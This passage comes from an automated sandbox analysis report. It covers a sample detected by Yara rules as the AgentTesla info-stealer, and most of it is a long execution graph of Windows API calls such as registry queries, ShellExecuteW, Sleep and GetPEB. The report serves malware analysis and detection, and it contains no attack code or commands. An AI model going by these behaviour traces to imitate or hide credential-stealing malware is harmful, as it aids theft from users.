                                      Commandline:"C:\Users\user\AppData\Local\seskin\troopwise.exe"
                                      Imagebase:0xeb0000
                                      File size:45'984 bytes
                                      MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.4204586491.000000000331E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.4204586491.0000000003306000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:high
                                      Has exited:false

                                      Disassembly

                                      Reset < >

                                        Execution Graph

                                        Execution Coverage:3.4%
                                        Dynamic/Decrypted Code Coverage:0.4%
                                        Signature Coverage:10.3%
                                        Total number of Nodes:2000
                                        Total number of Limit Nodes:177
                                        execution_graph 97568 e81078 97573 e871eb 97568->97573 97570 e8108c 97604 ea2f80 97570->97604 97574 e871fb __write_nolock 97573->97574 97607 e877c7 97574->97607 97578 e872ba 97619 ea074f 97578->97619 97585 e877c7 59 API calls 97586 e872eb 97585->97586 97638 e87eec 97586->97638 97588 e872f4 RegOpenKeyExW 97589 ebecda RegQueryValueExW 97588->97589 97593 e87316 Mailbox 97588->97593 97590 ebed6c RegCloseKey 97589->97590 97591 ebecf7 97589->97591 97590->97593 97603 ebed7e _wcscat Mailbox __NMSG_WRITE 97590->97603 97642 ea0ff6 97591->97642 97593->97570 97594 ebed10 97652 e8538e 97594->97652 97597 ebed38 97655 e87d2c 97597->97655 97599 e87b52 59 API calls 97599->97603 97600 ebed52 97600->97590 97602 e83f84 59 API calls 97602->97603 97603->97593 97603->97599 97603->97602 97664 e87f41 97603->97664 97729 ea2e84 97604->97729 97606 e81096 97608 ea0ff6 Mailbox 59 API calls 97607->97608 97609 e877e8 97608->97609 97610 ea0ff6 Mailbox 59 API calls 97609->97610 97611 e872b1 97610->97611 97612 e84864 97611->97612 97668 eb1b90 97612->97668 97615 e87f41 59 API calls 97616 e84897 97615->97616 97670 e848ae 97616->97670 97618 e848a1 Mailbox 97618->97578 97620 eb1b90 __write_nolock 97619->97620 97621 ea075c GetFullPathNameW 97620->97621 97622 ea077e 97621->97622 97623 e87d2c 59 API calls 97622->97623 97624 e872c5 97623->97624 97625 e87e0b 97624->97625 97626 e87e1f 97625->97626 97627 ebf173 97625->97627 97692 e87db0 97626->97692 97697 e88189 97627->97697 97630 e872d3 97632 e83f84 97630->97632 97631 ebf17e __NMSG_WRITE _memmove 97633 e83f92 97632->97633 97637 e83fb4 _memmove 97632->97637 97635 ea0ff6 Mailbox 59 API calls 97633->97635 97634 ea0ff6 Mailbox 59 API calls 97636 e83fc8 97634->97636 97635->97637 97636->97585 97637->97634 97639 e87f06 97638->97639 97641 e87ef9 97638->97641 97640 ea0ff6 Mailbox 59 API calls 97639->97640 97640->97641 97641->97588 97645 ea0ffe 97642->97645 97644 ea1018 97644->97594 97645->97644 97647 ea101c std::exception::exception 97645->97647 97700 ea594c 97645->97700 97717 ea35e1 RtlDecodePointer 97645->97717 97718 ea87db RaiseException 97647->97718 97649 ea1046 97719 ea8711 58 API calls _free 97649->97719 97651 ea1058 97651->97594 97653 ea0ff6 Mailbox 59 API calls 97652->97653 97654 e853a0 RegQueryValueExW 97653->97654 97654->97597 97654->97600 97656 e87da5 97655->97656 97658 e87d38 __NMSG_WRITE 97655->97658 97657 e87e8c 59 API calls 97656->97657 97663 e87d56 _memmove 97657->97663 97659 e87d4e 97658->97659 97660 e87d73 97658->97660 97728 e88087 59 API calls Mailbox 97659->97728 97662 e88189 59 API calls 97660->97662 97662->97663 97663->97600 97665 e87f50 __NMSG_WRITE _memmove 97664->97665 97666 ea0ff6 Mailbox 59 API calls 97665->97666 97667 e87f8e 97666->97667 97667->97603 97669 e84871 GetModuleFileNameW 97668->97669 97669->97615 97671 eb1b90 __write_nolock 97670->97671 97672 e848bb GetFullPathNameW 97671->97672 97673 e848da 97672->97673 97674 e848f7 97672->97674 97675 e87d2c 59 API calls 97673->97675 97676 e87eec 59 API calls 97674->97676 97677 e848e6 97675->97677 97676->97677 97680 e87886 97677->97680 97681 e87894 97680->97681 97684 e87e8c 97681->97684 97683 e848f2 97683->97618 97685 e87ea3 _memmove 97684->97685 97686 e87e9a 97684->97686 97685->97683 97686->97685 97688 e87faf 97686->97688 97689 e87fc2 97688->97689 97691 e87fbf _memmove 97688->97691 97690 ea0ff6 Mailbox 59 API calls 97689->97690 97690->97691 97691->97685 97693 e87dbf __NMSG_WRITE 97692->97693 97694 e88189 59 API calls 97693->97694 97695 e87dd0 _memmove 97693->97695 97696 ebf130 _memmove 97694->97696 97695->97630 97698 ea0ff6 Mailbox 59 API calls 97697->97698 97699 e88193 97698->97699 97699->97631 97701 ea59c7 97700->97701 97705 ea5958 97700->97705 97726 ea35e1 RtlDecodePointer 97701->97726 97703 ea59cd 97727 ea8d68 58 API calls __getptd_noexit 97703->97727 97704 ea5963 97704->97705 97720 eaa3ab 58 API calls __NMSG_WRITE 97704->97720 97721 eaa408 58 API calls 5 library calls 97704->97721 97722 ea32df GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 97704->97722 97705->97704 97708 ea598b RtlAllocateHeap 97705->97708 97711 ea59b3 97705->97711 97715 ea59b1 97705->97715 97723 ea35e1 RtlDecodePointer 97705->97723 97708->97705 97709 ea59bf 97708->97709 97709->97645 97724 ea8d68 58 API calls __getptd_noexit 97711->97724 97725 ea8d68 58 API calls __getptd_noexit 97715->97725 97717->97645 97718->97649 97719->97651 97720->97704 97721->97704 97723->97705 97724->97715 97725->97709 97726->97703 97727->97709 97728->97663 97730 ea2e90 __wfsopen 97729->97730 97737 ea3457 97730->97737 97736 ea2eb7 __wfsopen 97736->97606 97754 ea9e4b 97737->97754 97739 ea2e99 97740 ea2ec8 RtlDecodePointer RtlDecodePointer 97739->97740 97741 ea2ea5 97740->97741 97742 ea2ef5 97740->97742 97751 ea2ec2 97741->97751 97742->97741 97800 ea89e4 59 API calls __cftoe2_l 97742->97800 97744 ea2f58 RtlEncodePointer RtlEncodePointer 97744->97741 97745 ea2f2c 97745->97741 97750 ea2f46 RtlEncodePointer 97745->97750 97802 ea8aa4 61 API calls 2 library calls 97745->97802 97746 ea2f07 97746->97744 97746->97745 97801 ea8aa4 61 API calls 2 library calls 97746->97801 97749 ea2f40 97749->97741 97749->97750 97750->97744 97803 ea3460 97751->97803 97755 ea9e6f RtlEnterCriticalSection 97754->97755 97756 ea9e5c 97754->97756 97755->97739 97761 ea9ed3 97756->97761 97758 ea9e62 97758->97755 97785 ea32f5 58 API calls 3 library calls 97758->97785 97762 ea9edf __wfsopen 97761->97762 97763 ea9ee8 97762->97763 97764 ea9f00 97762->97764 97786 eaa3ab 58 API calls __NMSG_WRITE 97763->97786 97773 ea9f21 __wfsopen 97764->97773 97789 ea8a5d 58 API calls 2 library calls 97764->97789 97767 ea9eed 97787 eaa408 58 API calls 5 library calls 97767->97787 97768 ea9f15 97771 ea9f2b 97768->97771 97772 ea9f1c 97768->97772 97770 ea9ef4 97788 ea32df GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 97770->97788 97776 ea9e4b __lock 58 API calls 97771->97776 97790 ea8d68 58 API calls __getptd_noexit 97772->97790 97773->97758 97778 ea9f32 97776->97778 97779 ea9f3f 97778->97779 97780 ea9f57 97778->97780 97791 eaa06b InitializeCriticalSectionAndSpinCount 97779->97791 97792 ea2f95 97780->97792 97783 ea9f4b 97798 ea9f73 RtlLeaveCriticalSection _doexit 97783->97798 97786->97767 97787->97770 97789->97768 97790->97773 97791->97783 97793 ea2fc7 __dosmaperr 97792->97793 97794 ea2f9e RtlFreeHeap 97792->97794 97793->97783 97794->97793 97795 ea2fb3 97794->97795 97799 ea8d68 58 API calls __getptd_noexit 97795->97799 97797 ea2fb9 GetLastError 97797->97793 97798->97773 97799->97797 97800->97746 97801->97745 97802->97749 97806 ea9fb5 RtlLeaveCriticalSection 97803->97806 97805 ea2ec7 97805->97736 97806->97805 97807 11921a8 97821 118fde8 97807->97821 97809 1192283 97824 1192098 97809->97824 97827 11932c8 GetPEB 97821->97827 97823 1190473 97823->97809 97825 11920a1 Sleep 97824->97825 97826 11920af 97825->97826 97828 11932f2 97827->97828 97828->97823 97829 ec4599 97833 ed655c 97829->97833 97831 ec45a4 97832 ed655c 85 API calls 97831->97832 97832->97831 97834 ed6596 97833->97834 97839 ed6569 97833->97839 97834->97831 97835 ed6598 97872 e89488 84 API calls Mailbox 97835->97872 97837 ed659d 97844 e89997 97837->97844 97839->97834 97839->97835 97839->97837 97842 ed6590 97839->97842 97871 e89700 59 API calls _wcsstr 97842->97871 97845 e899ab 97844->97845 97846 e899b1 97844->97846 97862 e87c8e 97845->97862 97847 ebf9fc __i64tow 97846->97847 97848 e899f9 97846->97848 97850 e899b7 __itow 97846->97850 97853 ebf903 97846->97853 97873 ea38d8 83 API calls 3 library calls 97848->97873 97852 ea0ff6 Mailbox 59 API calls 97850->97852 97854 e899d1 97852->97854 97855 ebf97b Mailbox _wcscpy 97853->97855 97856 ea0ff6 Mailbox 59 API calls 97853->97856 97854->97845 97857 e87f41 59 API calls 97854->97857 97874 ea38d8 83 API calls 3 library calls 97855->97874 97858 ebf948 97856->97858 97857->97845 97859 ea0ff6 Mailbox 59 API calls 97858->97859 97860 ebf96e 97859->97860 97860->97855 97861 e87f41 59 API calls 97860->97861 97861->97855 97863 e87ca0 97862->97863 97864 ebf094 97862->97864 97875 e87bb1 97863->97875 97881 ed8123 59 API calls _memmove 97864->97881 97867 e87cac 97867->97834 97868 ebf09e 97882 e881a7 97868->97882 97870 ebf0a6 Mailbox 97871->97834 97872->97837 97873->97850 97874->97847 97876 e87bbf 97875->97876 97880 e87be5 _memmove 97875->97880 97877 ea0ff6 Mailbox 59 API calls 97876->97877 97876->97880 97878 e87c34 97877->97878 97879 ea0ff6 Mailbox 59 API calls 97878->97879 97879->97880 97880->97867 97881->97868 97883 e881ba 97882->97883 97884 e881b2 97882->97884 97883->97870 97886 e880d7 59 API calls 2 library calls 97884->97886 97886->97883 97887 ea7e93 97888 ea7e9f __wfsopen 97887->97888 97924 eaa048 GetStartupInfoW 97888->97924 97890 ea7ea4 97926 ea8dbc GetProcessHeap 97890->97926 97892 ea7efc 97893 ea7f07 97892->97893 98009 ea7fe3 58 API calls 3 library calls 97892->98009 97927 ea9d26 97893->97927 97896 ea7f0d 97897 ea7f18 __RTC_Initialize 97896->97897 98010 ea7fe3 58 API calls 3 library calls 97896->98010 97948 ead812 97897->97948 97900 ea7f27 97901 ea7f33 GetCommandLineW 97900->97901 98011 ea7fe3 58 API calls 3 library calls 97900->98011 97967 eb5173 GetEnvironmentStringsW 97901->97967 97904 ea7f32 97904->97901 97907 ea7f4d 97910 ea7f58 97907->97910 98012 ea32f5 58 API calls 3 library calls 97907->98012 97977 eb4fa8 97910->97977 97911 ea7f5e 97912 ea7f69 97911->97912 98013 ea32f5 58 API calls 3 library calls 97911->98013 97991 ea332f 97912->97991 97915 ea7f71 97916 ea7f7c __wwincmdln 97915->97916 98014 ea32f5 58 API calls 3 library calls 97915->98014 97997 e8492e 97916->97997 97919 ea7f90 97920 ea7f9f 97919->97920 98015 ea3598 58 API calls _doexit 97919->98015 98016 ea3320 58 API calls _doexit 97920->98016 97923 ea7fa4 __wfsopen 97925 eaa05e 97924->97925 97925->97890 97926->97892 98017 ea33c7 36 API calls 2 library calls 97927->98017 97929 ea9d2b 98018 ea9f7c InitializeCriticalSectionAndSpinCount __alloc_osfhnd 97929->98018 97931 ea9d30 97932 ea9d34 97931->97932 98020 ea9fca TlsAlloc 97931->98020 98019 ea9d9c 61 API calls 2 library calls 97932->98019 97935 ea9d39 97935->97896 97936 ea9d46 97936->97932 97937 ea9d51 97936->97937 98021 ea8a15 97937->98021 97940 ea9d93 98029 ea9d9c 61 API calls 2 library calls 97940->98029 97943 ea9d98 97943->97896 97944 ea9d72 97944->97940 97945 ea9d78 97944->97945 98028 ea9c73 58 API calls 4 library calls 97945->98028 97947 ea9d80 GetCurrentThreadId 97947->97896 97949 ead81e __wfsopen 97948->97949 97950 ea9e4b __lock 58 API calls 97949->97950 97951 ead825 97950->97951 97952 ea8a15 __calloc_crt 58 API calls 97951->97952 97953 ead836 97952->97953 97954 ead8a1 GetStartupInfoW 97953->97954 97955 ead841 __wfsopen @_EH4_CallFilterFunc@8 97953->97955 97957 ead9e5 97954->97957 97960 ead8b6 97954->97960 97955->97900 97956 eadaad 98043 eadabd RtlLeaveCriticalSection _doexit 97956->98043 97957->97956 97962 eada32 GetStdHandle 97957->97962 97963 eada45 GetFileType 97957->97963 98042 eaa06b InitializeCriticalSectionAndSpinCount 97957->98042 97959 ead904 97959->97957 97964 ead938 GetFileType 97959->97964 98041 eaa06b InitializeCriticalSectionAndSpinCount 97959->98041 97960->97957 97960->97959 97961 ea8a15 __calloc_crt 58 API calls 97960->97961 97961->97960 97962->97957 97963->97957 97964->97959 97968 ea7f43 97967->97968 97969 eb5184 97967->97969 97973 eb4d6b GetModuleFileNameW 97968->97973 98044 ea8a5d 58 API calls 2 library calls 97969->98044 97971 eb51aa _memmove 97972 eb51c0 FreeEnvironmentStringsW 97971->97972 97972->97968 97974 eb4d9f _wparse_cmdline 97973->97974 97976 eb4ddf _wparse_cmdline 97974->97976 98045 ea8a5d 58 API calls 2 library calls 97974->98045 97976->97907 97978 eb4fb9 97977->97978 97979 eb4fc1 __NMSG_WRITE 97977->97979 97978->97911 97980 ea8a15 __calloc_crt 58 API calls 97979->97980 97981 eb4fea __NMSG_WRITE 97980->97981 97981->97978 97982 eb5041 97981->97982 97984 ea8a15 __calloc_crt 58 API calls 97981->97984 97985 eb5066 97981->97985 97988 eb507d 97981->97988 98046 eb4857 58 API calls __cftoe2_l 97981->98046 97983 ea2f95 _free 58 API calls 97982->97983 97983->97978 97984->97981 97986 ea2f95 _free 58 API calls 97985->97986 97986->97978 98047 ea9006 IsProcessorFeaturePresent 97988->98047 97990 eb5089 97990->97911 97993 ea333b __IsNonwritableInCurrentImage 97991->97993 98070 eaa711 97993->98070 97994 ea3359 __initterm_e 97995 ea2f80 __cinit 67 API calls 97994->97995 97996 ea3378 __cinit __IsNonwritableInCurrentImage 97994->97996 97995->97996 97996->97915 97998 e84948 97997->97998 98008 e849e7 97997->98008 97999 e84982 745EC8D0 97998->97999 98073 ea35ac 97999->98073 98003 e849ae 98085 e84a5b SystemParametersInfoW SystemParametersInfoW 98003->98085 98005 e849ba 98086 e83b4c 98005->98086 98007 e849c2 SystemParametersInfoW 98007->98008 98008->97919 98009->97893 98010->97897 98011->97904 98015->97920 98016->97923 98017->97929 98018->97931 98019->97935 98020->97936 98022 ea8a1c 98021->98022 98024 ea8a57 98022->98024 98026 ea8a3a 98022->98026 98030 eb5446 98022->98030 98024->97940 98027 eaa026 TlsSetValue 98024->98027 98026->98022 98026->98024 98038 eaa372 Sleep 98026->98038 98027->97944 98028->97947 98029->97943 98031 eb5451 98030->98031 98037 eb546c 98030->98037 98032 eb545d 98031->98032 98031->98037 98039 ea8d68 58 API calls __getptd_noexit 98032->98039 98034 eb547c RtlAllocateHeap 98035 eb5462 98034->98035 98034->98037 98035->98022 98037->98034 98037->98035 98040 ea35e1 RtlDecodePointer 98037->98040 98038->98026 98039->98035 98040->98037 98041->97959 98042->97957 98043->97955 98044->97971 98045->97976 98046->97981 98048 ea9011 98047->98048 98053 ea8e99 98048->98053 98052 ea902c 98052->97990 98054 ea8eb3 _memset ___raise_securityfailure 98053->98054 98055 ea8ed3 IsDebuggerPresent 98054->98055 98061 eaa395 SetUnhandledExceptionFilter UnhandledExceptionFilter 98055->98061 98058 ea8fba 98060 eaa380 GetCurrentProcess TerminateProcess 98058->98060 98059 ea8f97 ___raise_securityfailure 98062 eac836 98059->98062 98060->98052 98061->98059 98063 eac83e 98062->98063 98064 eac840 IsProcessorFeaturePresent 98062->98064 98063->98058 98066 eb5b5a 98064->98066 98069 eb5b09 5 API calls ___raise_securityfailure 98066->98069 98068 eb5c3d 98068->98058 98069->98068 98071 eaa714 RtlEncodePointer 98070->98071 98071->98071 98072 eaa72e 98071->98072 98072->97994 98074 ea9e4b __lock 58 API calls 98073->98074 98075 ea35b7 RtlDecodePointer RtlEncodePointer 98074->98075 98138 ea9fb5 RtlLeaveCriticalSection 98075->98138 98077 e849a7 98078 ea3614 98077->98078 98079 ea3638 98078->98079 98080 ea361e 98078->98080 98079->98003 98080->98079 98139 ea8d68 58 API calls __getptd_noexit 98080->98139 98082 ea3628 98140 ea8ff6 9 API calls __cftoe2_l 98082->98140 98084 ea3633 98084->98003 98085->98005 98087 e83b59 __write_nolock 98086->98087 98088 e877c7 59 API calls 98087->98088 98089 e83b63 GetCurrentDirectoryW 98088->98089 98141 e83778 98089->98141 98091 e83b8c IsDebuggerPresent 98092 e83b9a 98091->98092 98093 ebd4ad MessageBoxA 98091->98093 98095 ebd4c7 98092->98095 98096 e83bb7 98092->98096 98125 e83c73 98092->98125 98093->98095 98094 e83c7a SetCurrentDirectoryW 98099 e83c87 Mailbox 98094->98099 98351 e87373 59 API calls Mailbox 98095->98351 98222 e873e5 98096->98222 98099->98007 98100 ebd4d7 98105 ebd4ed SetCurrentDirectoryW 98100->98105 98102 e83bd5 GetFullPathNameW 98103 e87d2c 59 API calls 98102->98103 98104 e83c10 98103->98104 98238 e90a8d 98104->98238 98105->98099 98108 e83c2e 98109 e83c38 98108->98109 98352 ee4c03 AllocateAndInitializeSid CheckTokenMembership FreeSid 98108->98352 98254 e83a58 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 98109->98254 98112 ebd50a 98112->98109 98116 ebd51b 98112->98116 98115 e83c42 98117 e83c55 98115->98117 98262 e843db 98115->98262 98118 e84864 61 API calls 98116->98118 98273 e90b30 98117->98273 98119 ebd523 98118->98119 98122 e87f41 59 API calls 98119->98122 98124 ebd530 98122->98124 98123 e83c60 98123->98125 98350 e844cb Shell_NotifyIconW _memset 98123->98350 98126 ebd53a 98124->98126 98127 ebd55f 98124->98127 98125->98094 98129 e87e0b 59 API calls 98126->98129 98130 e87e0b 59 API calls 98127->98130 98131 ebd545 98129->98131 98132 ebd55b GetForegroundWindow ShellExecuteW 98130->98132 98133 e87c8e 59 API calls 98131->98133 98136 ebd58f Mailbox 98132->98136 98135 ebd552 98133->98135 98137 e87e0b 59 API calls 98135->98137 98136->98125 98137->98132 98138->98077 98139->98082 98140->98084 98142 e877c7 59 API calls 98141->98142 98143 e8378e 98142->98143 98353 e83d43 98143->98353 98145 e837ac 98146 e84864 61 API calls 98145->98146 98147 e837c0 98146->98147 98148 e87f41 59 API calls 98147->98148 98149 e837cd 98148->98149 98367 e84f3d 98149->98367 98152 ebd3ae 98434 ee97e5 98152->98434 98153 e837ee Mailbox 98156 e881a7 59 API calls 98153->98156 98159 e83801 98156->98159 98157 ebd3cd 98158 ea2f95 _free 58 API calls 98157->98158 98161 ebd3da 98158->98161 98391 e893ea 98159->98391 98163 e84faa 84 API calls 98161->98163 98165 ebd3e3 98163->98165 98169 e83ee2 59 API calls 98165->98169 98166 e87f41 59 API calls 98167 e8381a 98166->98167 98394 e88620 98167->98394 98171 ebd3fe 98169->98171 98170 e8382c Mailbox 98172 e87f41 59 API calls 98170->98172 98173 e83ee2 59 API calls 98171->98173 98174 e83852 98172->98174 98175 ebd41a 98173->98175 98176 e88620 69 API calls 98174->98176 98177 e84864 61 API calls 98175->98177 98178 e83861 Mailbox 98176->98178 98179 ebd43f 98177->98179 98182 e877c7 59 API calls 98178->98182 98180 e83ee2 59 API calls 98179->98180 98181 ebd44b 98180->98181 98183 e881a7 59 API calls 98181->98183 98184 e8387f 98182->98184 98185 ebd459 98183->98185 98398 e83ee2 98184->98398 98187 e83ee2 59 API calls 98185->98187 98189 ebd468 98187->98189 98195 e881a7 59 API calls 98189->98195 98191 e83899 98191->98165 98192 e838a3 98191->98192 98193 ea313d _W_store_winword 60 API calls 98192->98193 98194 e838ae 98193->98194 98194->98171 98196 e838b8 98194->98196 98197 ebd48a 98195->98197 98198 ea313d _W_store_winword 60 API calls 98196->98198 98199 e83ee2 59 API calls 98197->98199 98200 e838c3 98198->98200 98201 ebd497 98199->98201 98200->98175 98202 e838cd 98200->98202 98201->98201 98203 ea313d _W_store_winword 60 API calls 98202->98203 98204 e838d8 98203->98204 98204->98189 98205 e83919 98204->98205 98207 e83ee2 59 API calls 98204->98207 98205->98189 98206 e83926 98205->98206 98414 e8942e 98206->98414 98208 e838fc 98207->98208 98210 e881a7 59 API calls 98208->98210 98212 e8390a 98210->98212 98214 e83ee2 59 API calls 98212->98214 98214->98205 98217 e893ea 59 API calls 98219 e83961 98217->98219 98218 e89040 60 API calls 98218->98219 98219->98217 98219->98218 98220 e83ee2 59 API calls 98219->98220 98221 e839a7 Mailbox 98219->98221 98220->98219 98221->98091 98223 e873f2 __write_nolock 98222->98223 98224 ebee4b _memset 98223->98224 98225 e8740b 98223->98225 98227 ebee67 7523D0D0 98224->98227 98226 e848ae 60 API calls 98225->98226 98228 e87414 98226->98228 98229 ebeeb6 98227->98229 99289 ea09d5 98228->99289 98232 e87d2c 59 API calls 98229->98232 98234 ebeecb 98232->98234 98234->98234 98235 e87429 99307 e869ca 98235->99307 98239 e90a9a __write_nolock 98238->98239 99559 e86ee0 98239->99559 98241 e90a9f 98242 e83c26 98241->98242 99570 e912fe 89 API calls 98241->99570 98242->98100 98242->98108 98244 e90aac 98244->98242 99571 e94047 91 API calls Mailbox 98244->99571 98246 e90ab5 98246->98242 98247 e90ab9 GetFullPathNameW 98246->98247 98248 e87d2c 59 API calls 98247->98248 98249 e90ae5 98248->98249 98250 e87d2c 59 API calls 98249->98250 98251 e90af2 98250->98251 98252 ec50d5 _wcscat 98251->98252 98253 e87d2c 59 API calls 98251->98253 98253->98242 98255 ebd49c 98254->98255 98256 e83ac2 LoadImageW RegisterClassExW 98254->98256 99613 e848fe LoadImageW EnumResourceNamesW 98255->99613 99609 e83041 GetSysColorBrush RegisterClassExW RegisterClipboardFormatW 98256->99609 98260 ebd4a5 98261 e839e7 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 98261->98115 98263 e84406 _memset 98262->98263 99614 e84213 98263->99614 98266 e8448b 98268 e844c1 Shell_NotifyIconW 98266->98268 98269 e844a5 Shell_NotifyIconW 98266->98269 98270 e844b3 98268->98270 98269->98270 99618 e8410d 98270->99618 98272 e844ba 98272->98117 98274 ec50ed 98273->98274 98285 e90b55 98273->98285 99697 eea0b5 89 API calls 4 library calls 98274->99697 98276 e90e5a 98276->98123 98279 e91044 98279->98276 98280 e91051 98279->98280 99695 e911f3 331 API calls Mailbox 98280->99695 98281 e90bab PeekMessageW 98349 e90b65 Mailbox 98281->98349 98284 e91058 LockWindowUpdate DestroyWindow GetMessageW 98284->98276 98287 e9108a 98284->98287 98285->98349 99698 e89fbd 60 API calls 98285->99698 99699 ed68bf 331 API calls 98285->99699 98286 ec52ab Sleep 98286->98349 98289 ec6082 TranslateMessage DispatchMessageW GetMessageW 98287->98289 98289->98289 98291 ec60b2 98289->98291 98290 e90e44 98290->98276 99694 e911d0 10 API calls Mailbox 98290->99694 98291->98276 98292 ec517a TranslateAcceleratorW 98295 e90fa3 PeekMessageW 98292->98295 98292->98349 98293 e89fbd 60 API calls 98293->98349 98294 e90fbf TranslateMessage DispatchMessageW 98294->98295 98295->98349 98296 ec5c49 WaitForSingleObject 98300 ec5c66 GetExitCodeProcess CloseHandle 98296->98300 98296->98349 98298 ea0ff6 59 API calls Mailbox 98298->98349 98299 e90e73 timeGetTime 98299->98349 98333 e910f5 98300->98333 98301 e90fdd Sleep 98334 e90fee Mailbox 98301->98334 98302 e881a7 59 API calls 98302->98349 98303 e877c7 59 API calls 98303->98334 98304 ec5f22 Sleep 98304->98334 98307 ea0719 timeGetTime 98307->98334 98308 e910ae timeGetTime 99696 e89fbd 60 API calls 98308->99696 98311 ec5fb9 GetExitCodeProcess 98314 ec5fcf WaitForSingleObject 98311->98314 98315 ec5fe5 CloseHandle 98311->98315 98312 e89997 84 API calls 98312->98349 98313 e8b93d 109 API calls 98313->98334 98314->98315 98314->98349 98315->98334 98318 f061ac 110 API calls 98318->98334 98319 ec5c9e 98319->98333 98320 ec54a2 Sleep 98320->98349 98321 ec6041 Sleep 98321->98349 98323 e87f41 59 API calls 98323->98334 98327 e8a000 304 API calls 98327->98349 98333->98123 98334->98303 98334->98307 98334->98311 98334->98313 98334->98318 98334->98319 98334->98320 98334->98321 98334->98323 98334->98333 98334->98349 99706 ee28f7 60 API calls 98334->99706 99707 e89fbd 60 API calls 98334->99707 99708 e88b13 69 API calls Mailbox 98334->99708 99709 e8b89c 331 API calls 98334->99709 99710 ed6a50 60 API calls 98334->99710 99711 ee54e6 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 98334->99711 99712 ee3e91 66 API calls Mailbox 98334->99712 98335 eea0b5 89 API calls 98335->98349 98337 e88b13 69 API calls 98337->98349 98338 e89df0 59 API calls Mailbox 98338->98349 98339 e88620 69 API calls 98339->98349 98340 e8b89c 304 API calls 98340->98349 98342 ed66f4 59 API calls Mailbox 98342->98349 98343 ec59ff VariantClear 98343->98349 98344 ec5a95 VariantClear 98344->98349 98345 e88e34 59 API calls Mailbox 98345->98349 98346 ec5843 VariantClear 98346->98349 98347 ed7405 59 API calls 98347->98349 98348 e87f41 59 API calls 98348->98349 98349->98281 98349->98286 98349->98290 98349->98292 98349->98293 98349->98294 98349->98295 98349->98296 98349->98298 98349->98299 98349->98301 98349->98302 98349->98304 98349->98308 98349->98312 98349->98327 98349->98333 98349->98334 98349->98335 98349->98337 98349->98338 98349->98339 98349->98340 98349->98342 98349->98343 98349->98344 98349->98345 98349->98346 98349->98347 98349->98348 99641 e8e800 98349->99641 99672 e8f5c0 98349->99672 99691 e8e580 331 API calls 98349->99691 99692 e8fe40 331 API calls 2 library calls 98349->99692 99693 e831ce IsDialogMessageW GetClassLongW 98349->99693 99700 f0629f 59 API calls 98349->99700 99701 ee9c9f 59 API calls Mailbox 98349->99701 99702 edd9e3 59 API calls 98349->99702 99703 ed6665 59 API calls 2 library calls 98349->99703 99704 e88561 59 API calls 98349->99704 99705 e8843f 59 API calls Mailbox 98349->99705 98350->98125 98351->98100 98352->98112 98354 e83d50 __write_nolock 98353->98354 98355 e87d2c 59 API calls 98354->98355 98360 e83eb6 Mailbox 98354->98360 98357 e83d82 98355->98357 98366 e83db8 Mailbox 98357->98366 98475 e87b52 98357->98475 98358 e87b52 59 API calls 98358->98366 98359 e83e89 98359->98360 98361 e87f41 59 API calls 98359->98361 98360->98145 98363 e83eaa 98361->98363 98362 e87f41 59 API calls 98362->98366 98364 e83f84 59 API calls 98363->98364 98364->98360 98365 e83f84 59 API calls 98365->98366 98366->98358 98366->98359 98366->98360 98366->98362 98366->98365 98478 e84d13 98367->98478 98372 e84f68 LoadLibraryExW 98488 e84cc8 98372->98488 98373 ebdd0f 98374 e84faa 84 API calls 98373->98374 98376 ebdd16 98374->98376 98378 e84cc8 3 API calls 98376->98378 98382 ebdd1e 98378->98382 98380 e84f8f 98381 e84f9b 98380->98381 98380->98382 98383 e84faa 84 API calls 98381->98383 98514 e8506b 98382->98514 98385 e837e6 98383->98385 98385->98152 98385->98153 98388 ebdd45 98522 e85027 98388->98522 98390 ebdd52 98392 ea0ff6 Mailbox 59 API calls 98391->98392 98393 e8380d 98392->98393 98393->98166 98395 e8862b 98394->98395 98397 e88652 98395->98397 98948 e88b13 69 API calls Mailbox 98395->98948 98397->98170 98399 e83eec 98398->98399 98400 e83f05 98398->98400 98401 e881a7 59 API calls 98399->98401 98402 e87d2c 59 API calls 98400->98402 98403 e8388b 98401->98403 98402->98403 98404 ea313d 98403->98404 98405 ea3149 98404->98405 98406 ea31be 98404->98406 98413 ea316e 98405->98413 98949 ea8d68 58 API calls __getptd_noexit 98405->98949 98951 ea31d0 60 API calls 3 library calls 98406->98951 98409 ea31cb 98409->98191 98410 ea3155 98950 ea8ff6 9 API calls __cftoe2_l 98410->98950 98412 ea3160 98412->98191 98413->98191 98415 e89436 98414->98415 98416 ea0ff6 Mailbox 59 API calls 98415->98416 98417 e89444 98416->98417 98418 e83936 98417->98418 98952 e8935c 59 API calls Mailbox 98417->98952 98420 e891b0 98418->98420 98953 e892c0 98420->98953 98422 e891bf 98423 ea0ff6 Mailbox 59 API calls 98422->98423 98424 e83944 98422->98424 98423->98424 98425 e89040 98424->98425 98426 ebf5a5 98425->98426 98432 e89057 98425->98432 98426->98432 98963 e88d3b 59 API calls Mailbox 98426->98963 98428 e89158 98430 ea0ff6 Mailbox 59 API calls 98428->98430 98429 e891a0 98962 e89e9c 60 API calls Mailbox 98429->98962 98433 e8915f 98430->98433 98432->98428 98432->98429 98432->98433 98433->98219 98435 e85045 85 API calls 98434->98435 98436 ee9854 98435->98436 98964 ee99be 98436->98964 98439 e8506b 74 API calls 98440 ee9881 98439->98440 98441 e8506b 74 API calls 98440->98441 98442 ee9891 98441->98442 98443 e8506b 74 API calls 98442->98443 98444 ee98ac 98443->98444 98445 e8506b 74 API calls 98444->98445 98446 ee98c7 98445->98446 98447 e85045 85 API calls 98446->98447 98448 ee98de 98447->98448 98449 ea594c __crtLCMapStringA_stat 58 API calls 98448->98449 98450 ee98e5 98449->98450 98451 ea594c __crtLCMapStringA_stat 58 API calls 98450->98451 98452 ee98ef 98451->98452 98453 e8506b 74 API calls 98452->98453 98454 ee9903 98453->98454 98455 ee9393 